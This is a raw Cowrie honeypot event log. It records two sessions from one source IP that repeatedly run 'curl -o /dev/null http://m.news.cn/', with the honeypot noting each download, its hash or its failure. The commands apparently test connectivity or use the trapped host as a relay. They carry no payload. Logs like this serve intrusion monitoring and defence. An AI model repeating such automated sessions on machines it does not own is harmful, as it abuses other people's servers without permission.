{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.801853Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.805500Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.806485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.812756Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.813921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.839421Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.839998Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.848834Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.850295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.851636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.858839Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.859677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.888324Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.896556Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.909056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.910303Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.913402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.914652Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.920065Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.925430Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.927833Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.956281Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:54.957484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.958470Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.963918Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:54.973331Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.021327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.022384Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.042319Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.060215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.061167Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.074861Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.078529Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.080037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.099333Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.112438Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.113337Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.119366Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.129469Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.130404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.136919Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.161056Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.162063Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.165441Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.175738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.176906Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.181872Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.209050Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.210484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.216423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.217577Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.221390Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.258324Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.259696Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.276140Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.290869Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.322985Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.324130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.348955Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.355642Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.356562Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.390412Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.393317Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.394114Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.398188Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.400034Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.401677Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.460997Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.520683Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.521990Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.570868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.571740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.590737Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.592195Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.682682Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.683802Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.698228Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.699286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.739750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.740712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.751754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.752716Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.809928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.810973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.820592Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.821589Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.831302Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.851232Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.870860Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.871871Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.876628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.877636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.932521Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.933901Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.937766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.938750Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:55.996173Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:55.997592Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:56.001223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.002455Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:56.058267Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
